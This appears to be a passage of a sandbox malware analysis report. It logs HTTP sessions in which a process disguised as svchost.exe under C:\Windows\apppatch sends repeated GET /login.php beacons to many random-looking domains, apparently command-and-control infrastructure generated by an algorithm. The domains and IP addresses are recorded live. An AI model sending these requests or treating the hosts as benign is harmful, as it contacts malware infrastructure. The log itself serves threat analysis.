Sep 8, 2024 10:52:35.209353924 CEST | 173 | IN | Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Sep 8, 2024 10:52:36.990000010 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
Sep 8, 2024 10:52:37.784790039 CEST | 793 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:37 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkmLgFDR%2BAslHr3zi02MzrjIe4MixGHHNVn3xdTh3QBvmXR5QrZbluHr%2Fp4MIzRgVf%2B7FjW4rh4hBQWl9Tc8WNRCXyL5vXO2t7r5P%2BLf1b4SEMG7UudyTaz0vafvUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb4137c9b43e7-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49708 | 162.255.119.102 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:34.426225901 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
Sep 8, 2024 10:52:35.160356998 CEST | 303 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:35 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                          X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                          Server: namecheap-nginx
                                                                                                                                                                                                          Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                          Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49709 | 44.221.84.105 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:34.427041054 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vocyzit.com
Sep 8, 2024 10:52:34.900964022 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:34 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=163736594642e010dac643a03a19fdf5|8.46.123.33|1725785554|1725785554|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49710 | 18.208.156.248 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:34.479922056 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vonypom.com
Sep 8, 2024 10:52:34.935336113 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:34 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=e8200e7f93821a3a5b7931eb0293e52a|8.46.123.33|1725785554|1725785554|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49711 | 3.64.163.50 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:34.543483973 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49712 | 3.64.163.50 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:34.563905954 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vojyqem.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49713 | 44.221.84.105 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:34.741276026 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qetyfuv.com
Sep 8, 2024 10:52:35.218072891 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:35 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=feb35453583f3275d33399c7e7a69ec0|8.46.123.33|1725785555|1725785555|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49714 | 3.94.10.34 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:34.853028059 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lymyxid.com
Sep 8, 2024 10:52:35.340611935 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:35 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=d457d1fa32ac3fd9d4d24f7ddbb486df|8.46.123.33|1725785555|1725785555|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49715 | 208.100.26.245 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:34.858284950 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
Sep 8, 2024 10:52:35.348762989 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:35 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 10:52:35.349855900 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
Sep 8, 2024 10:52:35.465914011 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:35 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49716 | 199.191.50.83 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:34.858422995 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galyqaz.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49717 | 5.79.71.225 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:34.858458042 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyfus.com
Sep 8, 2024 10:53:05.537744045 CEST | 17 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Data Raw:
                                                                                                                                                                                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49718 | 69.162.80.55 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:34.968249083 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyfyj.com
Sep 8, 2024 10:52:35.489614964 CEST | 924 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                          cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          content-length: 481
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:52:35 GMT
                                                                                                                                                                                                          server: nginx
                                                                                                                                                                                                          set-cookie: sid=b166d882-6dbf-11ef-90a1-9c5e8dd41795; path=/; domain=.lysyfyj.com; expires=Fri, 26 Sep 2092 12:06:42 GMT; max-age=2147483647; HttpOnly
                                                                                                                                                                                                          Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc5Mjc1NSwiaWF0IjoxNzI1Nzg1NTU1LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqaGtkZG9wczI0Z3FzZTgxZWlmYTgiLCJuYmYiOjE3MjU3ODU1NTUsInRzIjoxNzI1Nzg1NTU1NDI3NzY4fQ.R7gYMiM0-esfAi-7YdBvIdCrTc4bCyNkfUzsbdZ9bEU&sid=b166d882-6dbf-11ef-90a1-9c5e8dd41795');</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.9 | 49719 | 154.212.231.82 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:35.005671024 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
Sep 8, 2024 10:52:35.992845058 CEST | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:35 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 10:52:35.994051933 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
Sep 8, 2024 10:52:36.406563997 CEST | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:36 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.9 | 49721 | 91.195.240.19 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:35.376718044 CEST | 271 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: www.gahyqah.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043301105 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:52:35 GMT
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                          last-modified: Sun, 08 Sep 2024 08:52:35 GMT
                                                                                                                                                                                                          x-cache-miss-from: parking-7768d5b45d-7fh86
                                                                                                                                                                                                          server: Parking/1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.9 | 49724 | 3.64.163.50 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:55.922043085 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 49725 | 3.64.163.50 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:55.933108091 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vojyqem.com
Sep 8, 2024 10:52:56.567173958 CEST | 689 | IN | HTTP/1.1 410 Gone
Server: openresty
Date: Sun, 08 Sep 2024 08:52:56 GMT
Content-Type: text/html
Content-Length: 542
Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 49726 | 199.191.50.83 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:52:56.249783993 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galyqaz.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 49742 | 13.248.169.48 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:17.665863991 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupydeq.com
Sep 8, 2024 10:53:18.206531048 CEST | 259 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Sun, 08 Sep 2024 08:53:18 GMT
Content-Type: text/html
Content-Length: 114
Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 49743 | 188.114.96.3 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:17.771423101 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysyvan.com
Sep 8, 2024 10:53:18.503597021 CEST | 616 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:18 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
